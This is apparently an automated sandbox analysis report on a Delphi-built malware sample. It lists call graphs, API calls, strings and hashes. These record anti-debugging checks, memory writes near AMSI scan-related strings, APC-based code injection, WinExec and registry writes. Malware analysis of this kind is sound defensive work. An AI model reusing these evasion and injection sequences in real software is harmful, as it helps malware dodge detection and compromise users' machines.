API calls 77092->77094 77095 29089d0 20 API calls 77093->77095 77094->76551 77096 291a8fa 77095->77096 77097 28f4860 11 API calls 77096->77097 77098 291a91b 77097->77098 77099 28f47ec 11 API calls 77098->77099 77100 291a952 77099->77100 77101 29089d0 20 API calls 77100->77101 77102 291a976 77101->77102 77103 29089d0 20 API calls 77102->77103 77104 291a985 77103->77104 77105 29089d0 20 API calls 77104->77105 77106 291a994 77105->77106 77107 29089d0 20 API calls 77106->77107 77108 291a9a3 77107->77108 77109 29089d0 20 API calls 77108->77109 77110 291a9b2 77109->77110 77111 29089d0 20 API calls 77110->77111 77112 291a9c1 77111->77112 77113 29089d0 20 API calls 77112->77113 77114 291a9d0 77113->77114 77115 29089d0 20 API calls 77114->77115 77116 291a9df 77115->77116 77117 29089d0 20 API calls 77116->77117 77118 291a9ee 77117->77118 77119 29089d0 20 API calls 77118->77119 77120 291a9fd 77119->77120 77121 29089d0 20 API calls 77120->77121 77122 291aa0c 77121->77122 77123 29089d0 20 API calls 77122->77123 77124 291aa1b 77123->77124 77125 29089d0 20 API calls 77124->77125 77126 291aa2a 77125->77126 77127 29089d0 20 API calls 77126->77127 77128 291aa39 77127->77128 77129 29089d0 20 API calls 77128->77129 77130 291aa48 77129->77130 77131 29089d0 20 API calls 77130->77131 77132 291aa57 77131->77132 77133 28f4860 11 API calls 77132->77133 77134 291aa78 77133->77134 77135 28f47ec 11 API calls 77134->77135 77136 291aaaf 77135->77136 77137 29089d0 20 API calls 77136->77137 77138 291aad3 77137->77138 77139 29089d0 20 API calls 77138->77139 77140 291ab06 77139->77140 77141 29089d0 20 API calls 77140->77141 77142 291ab39 77141->77142 77143 29089d0 20 API calls 77142->77143 77144 291ab6c 77143->77144 77145 29089d0 20 API calls 77144->77145 77146 291ab9f 77145->77146 77147 29089d0 20 API calls 77146->77147 77148 291abd2 77147->77148 77149 29089d0 20 API calls 77148->77149 77150 291ac05 77149->77150 77151 29089d0 20 API calls 77150->77151 77152 291ac38 77151->77152 77153 28f4860 11 API 
calls 77152->77153 77154 291ac59 77153->77154 77155 28f47ec 11 API calls 77154->77155 77156 291ac90 77155->77156 77157 29089d0 20 API calls 77156->77157 77158 291acb4 77157->77158 77159 28f4860 11 API calls 77158->77159 77160 291acd5 77159->77160 77161 28f47ec 11 API calls 77160->77161 77162 291ad0c 77161->77162 77163 29089d0 20 API calls 77162->77163 77164 291ad30 77163->77164 77165 28f4860 11 API calls 77164->77165 77166 291ad51 77165->77166 77167 28f47ec 11 API calls 77166->77167 77168 291ad88 77167->77168 77169 29089d0 20 API calls 77168->77169 77170 291adac 77169->77170 77171 29089d0 20 API calls 77170->77171 77172 291addf 77171->77172 77173 29089d0 20 API calls 77172->77173 77174 291ae12 77173->77174 77175 29089d0 20 API calls 77174->77175 77176 291ae45 77175->77176 77177 29089d0 20 API calls 77176->77177 77178 291ae78 77177->77178 77179 29089d0 20 API calls 77178->77179 77180 291aeab 77179->77180 77181 29089d0 20 API calls 77180->77181 77182 291aede 77181->77182 77183 29089d0 20 API calls 77182->77183 77184 291af11 77183->77184 77185 29089d0 20 API calls 77184->77185 77186 291af44 77185->77186 77187 29089d0 20 API calls 77186->77187 77188 291af77 77187->77188 77189 29089d0 20 API calls 77188->77189 77190 291afaa 77189->77190 77191 29089d0 20 API calls 77190->77191 77192 291afdd 77191->77192 77193 29089d0 20 API calls 77192->77193 77194 291b010 77193->77194 77195 29089d0 20 API calls 77194->77195 77196 291b043 77195->77196 77197 29089d0 20 API calls 77196->77197 77198 291b076 77197->77198 77199 29089d0 20 API calls 77198->77199 77200 291b0a9 77199->77200 77201 29089d0 20 API calls 77200->77201 77202 291b0dc 77201->77202 77203 29089d0 20 API calls 77202->77203 77204 291b10f 77203->77204 77205 29089d0 20 API calls 77204->77205 77206 291b142 77205->77206 77207 29089d0 20 API calls 77206->77207 77208 291b175 77207->77208 77209 2908338 18 API calls 77208->77209 77210 291b184 77209->77210 77211 28f4860 11 API calls 77210->77211 77212 291b1a5 77211->77212 77213 
28f47ec 11 API calls 77212->77213 77214 291b1dc 77213->77214 77215 29089d0 20 API calls 77214->77215 77216 291b200 77215->77216 77217 28f4860 11 API calls 77216->77217 77218 291b221 77217->77218 77219 28f47ec 11 API calls 77218->77219 77220 291b258 77219->77220 77221 29089d0 20 API calls 77220->77221 77222 291b27c 77221->77222 77223 28f4860 11 API calls 77222->77223 77224 291b29d 77223->77224 77225 28f47ec 11 API calls 77224->77225 77226 291b2d4 77225->77226 77227 29089d0 20 API calls 77226->77227 77228 291b2f8 ExitProcess 77227->77228 77234 290e114 77229->77234 77230 290e197 77231 28f44dc 11 API calls 77230->77231 77233 290e19f 77231->77233 77232 28f49f8 11 API calls 77232->77234 77235 28f4530 11 API calls 77233->77235 77234->77230 77234->77232 77236 290e1aa 77235->77236 77237 28f4500 11 API calls 77236->77237 77238 290e1c4 77237->77238 77238->76442 77240 290f22b 77239->77240 77241 290f256 RegOpenKeyA 77240->77241 77242 290f264 77241->77242 77243 28f49f8 11 API calls 77242->77243 77244 290f27c 77243->77244 77245 290f289 RegSetValueExA RegCloseKey 77244->77245 77246 290f2ad 77245->77246 77247 28f4500 11 API calls 77246->77247 77248 290f2ba 77247->77248 77249 28f44dc 11 API calls 77248->77249 77250 290f2c2 77249->77250 77250->76445 77252 290d16d 77251->77252 77252->77252 77253 28f4860 11 API calls 77252->77253 77254 290d1af 77253->77254 77255 28f47ec 11 API calls 77254->77255 77256 290d1d4 77255->77256 77257 29089d0 20 API calls 77256->77257 77258 290d1ef 77257->77258 77259 28f4860 11 API calls 77258->77259 77260 290d208 77259->77260 77261 28f47ec 11 API calls 77260->77261 77262 290d22d 77261->77262 77263 29089d0 20 API calls 77262->77263 77264 290d248 77263->77264 77265 28f4860 11 API calls 77264->77265 77266 290d261 77265->77266 77267 28f47ec 11 API calls 77266->77267 77268 290d286 77267->77268 77269 29089d0 20 API calls 77268->77269 77270 290d2a1 77269->77270 77271 28f4860 11 API calls 77270->77271 77272 290d2ba 77271->77272 77273 28f47ec 11 API calls 
77272->77273 77274 290d2df 77273->77274 77275 29089d0 20 API calls 77274->77275 77276 290d2fa 77275->77276 77277 28f4860 11 API calls 77276->77277 77278 290d313 77277->77278 77279 28f47ec 11 API calls 77278->77279 77280 290d338 77279->77280 77281 29089d0 20 API calls 77280->77281 77282 290d353 77281->77282 77283 28f4860 11 API calls 77282->77283 77284 290d36c 77283->77284 77285 28f47ec 11 API calls 77284->77285 77286 290d391 77285->77286 77287 29089d0 20 API calls 77286->77287 77288 290d3ac 77287->77288 77289 28f4860 11 API calls 77288->77289 77290 290d3c5 77289->77290 77291 28f47ec 11 API calls 77290->77291 77292 290d3ea 77291->77292 77293 29089d0 20 API calls 77292->77293 77294 290d405 77293->77294 77295 28f4860 11 API calls 77294->77295 77296 290d421 77295->77296 77297 28f47ec 11 API calls 77296->77297 77298 290d44c 77297->77298 77299 29089d0 20 API calls 77298->77299 77300 290d470 77299->77300 77301 28f4860 11 API calls 77300->77301 77302 290d48c 77301->77302 77303 28f47ec 11 API calls 77302->77303 77304 290d4bd 77303->77304 77305 29089d0 20 API calls 77304->77305 77306 290d4e1 77305->77306 77307 290d558 77306->77307 77309 28f4860 11 API calls 77306->77309 77308 28f4860 11 API calls 77307->77308 77310 290d574 77308->77310 77311 290d503 77309->77311 77312 28f47ec 11 API calls 77310->77312 77313 28f47ec 11 API calls 77311->77313 77314 290d5a5 77312->77314 77315 290d534 77313->77315 77316 29089d0 20 API calls 77314->77316 77317 29089d0 20 API calls 77315->77317 77318 290d5c9 77316->77318 77317->77307 77319 28f4860 11 API calls 77318->77319 77320 290d5e5 77319->77320 77321 28f47ec 11 API calls 77320->77321 77322 290d616 77321->77322 77323 29089d0 20 API calls 77322->77323 77324 290d63a 77323->77324 77325 28f4860 11 API calls 77324->77325 77326 290d656 77325->77326 77327 28f47ec 11 API calls 77326->77327 77328 290d687 77327->77328 77329 29089d0 20 API calls 77328->77329 77330 290d6ab 77329->77330 77331 28f2ee0 2 API calls 77330->77331 77332 290d6b0 77331->77332 
77333 28f4860 11 API calls 77332->77333 77334 290d6e0 77333->77334 77335 28f47ec 11 API calls 77334->77335 77336 290d711 77335->77336 77337 29089d0 20 API calls 77336->77337 77338 290d735 77337->77338 77339 28f4860 11 API calls 77338->77339 77340 290d751 77339->77340 77341 28f47ec 11 API calls 77340->77341 77342 290d782 77341->77342 77343 29089d0 20 API calls 77342->77343 77344 290d7a6 77343->77344 77413 2907a2c 77344->77413 77347 290d835 77348 28f4860 11 API calls 77347->77348 77350 290d851 77348->77350 77349 28f4860 11 API calls 77351 290d7e0 77349->77351 77352 28f47ec 11 API calls 77350->77352 77353 28f47ec 11 API calls 77351->77353 77354 290d882 77352->77354 77355 290d811 77353->77355 77356 29089d0 20 API calls 77354->77356 77357 29089d0 20 API calls 77355->77357 77358 290d8a6 77356->77358 77357->77347 77359 28f4860 11 API calls 77358->77359 77360 290d8c2 77359->77360 77361 28f47ec 11 API calls 77360->77361 77362 290d8f3 77361->77362 77363 29089d0 20 API calls 77362->77363 77364 290d917 77363->77364 77365 2907d78 18 API calls 77364->77365 77366 290d92f 77365->77366 77367 28f4860 11 API calls 77366->77367 77368 290d94b 77367->77368 77369 28f47ec 11 API calls 77368->77369 77370 290d97c 77369->77370 77371 29089d0 20 API calls 77370->77371 77372 290d9a0 77371->77372 77373 28f4860 11 API calls 77372->77373 77374 290d9bc 77373->77374 77375 28f47ec 11 API calls 77374->77375 77376 290d9ed 77375->77376 77377 29089d0 20 API calls 77376->77377 77378 290da11 77377->77378 77379 28f4860 11 API calls 77378->77379 77380 290da2d 77379->77380 77381 28f47ec 11 API calls 77380->77381 77382 290da5e 77381->77382 77383 29089d0 20 API calls 77382->77383 77384 290da82 77383->77384 77385 28f4500 11 API calls 77384->77385 77386 290daa1 77385->77386 77386->76770 77388 29081cc 17 API calls 77387->77388 77389 2908742 77388->77389 77390 2908274 15 API calls 77389->77390 77391 2908748 NtQueueApcThread 77390->77391 77391->76860 77393 28f4530 11 API calls 77392->77393 77394 29085df 77393->77394 
77395 28f4860 11 API calls 77394->77395 77396 29085fe 77395->77396 77397 29081cc 17 API calls 77396->77397 77398 2908611 77397->77398 77399 2908274 15 API calls 77398->77399 77400 2908617 WinExec 77399->77400 77401 2908639 77400->77401 77402 28f44dc 11 API calls 77401->77402 77403 2908641 77402->77403 77403->76543 77404->76602 77405->76761 77406->76816 77407->76936 77427 28f49a0 77408->77427 77411 28f7e71 77411->76767 77411->76768 77412->76613 77414 28f4530 11 API calls 77413->77414 77415 2907a51 77414->77415 77416 290798c 12 API calls 77415->77416 77417 2907a5e 77416->77417 77418 28f47ec 11 API calls 77417->77418 77419 2907a6b 77418->77419 77420 29081cc 17 API calls 77419->77420 77421 2907a7e 77420->77421 77422 2908274 15 API calls 77421->77422 77423 2907a84 NtAllocateVirtualMemory 77422->77423 77424 2907ab5 77423->77424 77425 28f4500 11 API calls 77424->77425 77426 2907ac2 77425->77426 77426->77347 77426->77349 77428 28f49a4 GetFileAttributesA 77427->77428 77428->77411 77429 291d2fc 77439 28f656c 77429->77439 77433 291d32a 77444 291c35c timeSetEvent 77433->77444 77435 291d334 77436 291d342 GetMessageA 77435->77436 77437 291d352 77436->77437 77438 291d336 TranslateMessage DispatchMessageA 77436->77438 77438->77436 77440 28f6577 77439->77440 77445 28f4198 77440->77445 77443 28f42ac SysFreeString SysReAllocStringLen SysAllocStringLen 77443->77433 77444->77435 77446 28f41de 77445->77446 77447 28f43e8 77446->77447 77448 28f4257 77446->77448 77450 28f4419 77447->77450 77454 28f442a 77447->77454 77459 28f4130 77448->77459 77464 28f435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 77450->77464 77453 28f4423 77453->77454 77455 28f446f FreeLibrary 77454->77455 77456 28f4493 77454->77456 77455->77454 77457 28f449c 77456->77457 77458 28f44a2 ExitProcess 77456->77458 77457->77458 77460 28f4140 77459->77460 77461 28f4173 77459->77461 77460->77461 77462 28f15cc VirtualAlloc 77460->77462 77465 28f5868 77460->77465 77461->77443 77462->77460 77464->77453 77466 28f5878 
GetModuleFileNameA 77465->77466 77467 28f5894 77465->77467 77469 28f5acc GetModuleFileNameA RegOpenKeyExA 77466->77469 77467->77460 77470 28f5b4f 77469->77470 77471 28f5b0f RegOpenKeyExA 77469->77471 77487 28f5908 12 API calls 77470->77487 77471->77470 77472 28f5b2d RegOpenKeyExA 77471->77472 77472->77470 77474 28f5bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 77472->77474 77478 28f5c0f 77474->77478 77479 28f5cf2 77474->77479 77475 28f5b74 RegQueryValueExA 77476 28f5bb2 RegCloseKey 77475->77476 77477 28f5b94 RegQueryValueExA 77475->77477 77476->77467 77477->77476 77478->77479 77481 28f5c1f lstrlenA 77478->77481 77479->77467 77482 28f5c37 77481->77482 77482->77479 77483 28f5c5c lstrcpynA LoadLibraryExA 77482->77483 77484 28f5c84 77482->77484 77483->77484 77484->77479 77485 28f5c8e lstrcpynA LoadLibraryExA 77484->77485 77485->77479 77486 28f5cc0 lstrcpynA LoadLibraryExA 77485->77486 77486->77479 77487->77475

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 9232 28f5acc-28f5b0d GetModuleFileNameA RegOpenKeyExA 9233 28f5b4f-28f5b92 call 28f5908 RegQueryValueExA 9232->9233 9234 28f5b0f-28f5b2b RegOpenKeyExA 9232->9234 9239 28f5bb6-28f5bd0 RegCloseKey 9233->9239 9240 28f5b94-28f5bb0 RegQueryValueExA 9233->9240 9234->9233 9235 28f5b2d-28f5b49 RegOpenKeyExA 9234->9235 9235->9233 9237 28f5bd8-28f5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 9235->9237 9241 28f5c0f-28f5c13 9237->9241 9242 28f5cf2-28f5cf9 9237->9242 9240->9239 9243 28f5bb2 9240->9243 9245 28f5c1f-28f5c35 lstrlenA 9241->9245 9246 28f5c15-28f5c19 9241->9246 9243->9239 9247 28f5c38-28f5c3b 9245->9247 9246->9242 9246->9245 9248 28f5c3d-28f5c45 9247->9248 9249 28f5c47-28f5c4f 9247->9249 9248->9249 9250 28f5c37 9248->9250 9249->9242 9251 28f5c55-28f5c5a 9249->9251 9250->9247 9252 28f5c5c-28f5c82 lstrcpynA LoadLibraryExA 9251->9252 9253 28f5c84-28f5c86 9251->9253 9252->9253 9253->9242 9254 28f5c88-28f5c8c 9253->9254 9254->9242 9255 28f5c8e-28f5cbe lstrcpynA LoadLibraryExA 9254->9255 9255->9242 9256 28f5cc0-28f5cf0 lstrcpynA LoadLibraryExA 9255->9256 9256->9242
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,028F0000,0291E790), ref: 028F5AE8
                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B06
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B24
                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028F5B42
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028F5B8B
                                                          • RegQueryValueExA.ADVAPI32(?,028F5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001), ref: 028F5BA9
                                                          • RegCloseKey.ADVAPI32(?,028F5BD8,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028F5BCB
                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028F5BE8
                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028F5BF5
                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028F5BFB
                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028F5C26
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C6D
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C7D
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5CA5
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5CB5
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028F5CDB
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028F5CEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                          • API String ID: 1759228003-2375825460
                                                          • Opcode ID: a6c78ca6f48611395a507d999f400ea91cb8a2521ed7642ead4d3760b49cd47c
                                                          • Instruction ID: 6af000a09ffe07b36c0fcf3e91767cae33e707c6a7b55c9c501a897eb4791729
                                                          • Opcode Fuzzy Hash: a6c78ca6f48611395a507d999f400ea91cb8a2521ed7642ead4d3760b49cd47c
                                                          • Instruction Fuzzy Hash: 7951887DA4025CBEFB61D7E8CC46FEF77AD9B04744F8001A1AB09E6181D7789A448FA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 11492 290894c-2908971 LoadLibraryW 11493 2908973-290898b GetProcAddress 11492->11493 11494 29089bb-29089c1 11492->11494 11495 29089b0-29089b6 FreeLibrary 11493->11495 11496 290898d-29089ac call 2907d78 11493->11496 11495->11494 11496->11495 11499 29089ae 11496->11499 11499->11495
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize,029773A8,0290A93C,UacScan), ref: 02908960
                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0290897A
                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize), ref: 029089B6
                                                            • Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                          • String ID: BCryptVerifySignature$bcrypt
                                                          • API String ID: 1002360270-4067648912
                                                          • Opcode ID: 060dcdd68f6b6a400e4aa5457fcba9d154af2ba29939fa3f688e6c3878d9fab9
                                                          • Instruction ID: 2ccf493237c37b7f74a768326b0eb57af9f104d832e1ab58e00336038c58047f
                                                          • Opcode Fuzzy Hash: 060dcdd68f6b6a400e4aa5457fcba9d154af2ba29939fa3f688e6c3878d9fab9
                                                          • Instruction Fuzzy Hash: 88F0AFB1EC8318AEF310A6E8B889FF7B79DA78071CF000929B91887180D6741858CF61

                                                          Control-flow Graph

                                                          • 290f744-290f75e GetModuleHandleW -> 290f760-290f772 GetProcAddress, 290f78a-290f792
                                                          • 290f760-290f772 GetProcAddress -> 290f78a-290f792, 290f774-290f784 CheckRemoteDebuggerPresent
                                                          • 290f774-290f784 CheckRemoteDebuggerPresent -> 290f78a-290f792, 290f786
                                                          • 290f786 -> 290f78a-290f792
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 0290F754
                                                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0290F766
                                                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0290F77D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                          • API String ID: 35162468-539270669
                                                          • Opcode ID: f6508dc8c038deec1cb3e75601bff6753c4c17aa42e1f7651fcdba0b9bc486ff
                                                          • Instruction ID: 9e1ed026e5eddab8d10ee8e223a5afaa8ac5d1f0f6bc49ff8ff25e26faad3661
                                                          • Opcode Fuzzy Hash: f6508dc8c038deec1cb3e75601bff6753c4c17aa42e1f7651fcdba0b9bc486ff
                                                          • Instruction Fuzzy Hash: 48F0A77590425CBEEB20A6B888C87DCFBBD9B05328F2443919435A25C1FB792741CA52

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 028F4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4F2E
                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DE40), ref: 0290DDAB
                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0290DE40), ref: 0290DDDB
                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0290DDF0
                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0290DE1C
                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0290DE25
                                                            • Part of subcall function 028F4C60: SysFreeString.OLEAUT32(0290F4A4), ref: 028F4C6E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                          • String ID:
                                                          • API String ID: 1897104825-0
                                                          • Opcode ID: b98bcdfebe9e709ca2103ad096d7d2a6a41439538f252c36307b52bcb7646710
                                                          • Instruction ID: 027ed8a6371d7de0aaaf5480b765060e7528ade98cbe48609a482f1998d16726
                                                          • Opcode Fuzzy Hash: b98bcdfebe9e709ca2103ad096d7d2a6a41439538f252c36307b52bcb7646710
                                                          • Instruction Fuzzy Hash: 3021BE75B4020CBEEB51EAD4CC92FDF77ADEB48700F510466B704E71C0DA74AA058B65

                                                          Control-flow Graph

                                                          APIs
                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0290E5F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CheckConnectionInternet
                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                          • API String ID: 3847983778-3852638603
                                                          • Opcode ID: 9db11b1c8a4a3d1a8d170355fa4ee9239984f26c456e7f9c4bc26f0b1db9fe43
                                                          • Instruction ID: 627e6808591b26e9978467c50870d13a64c0a73157bfd3ea4959b5a31f10e969
                                                          • Opcode Fuzzy Hash: 9db11b1c8a4a3d1a8d170355fa4ee9239984f26c456e7f9c4bc26f0b1db9fe43
                                                          • Instruction Fuzzy Hash: 6141133DB1010D9FEB41EBA8D881ADF73FAEF88700F104426E641E7291DA75AD018F56

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 028F4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4F2E
                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DD5E), ref: 0290DCCB
                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DD05
                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290DD32
                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290DD3B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
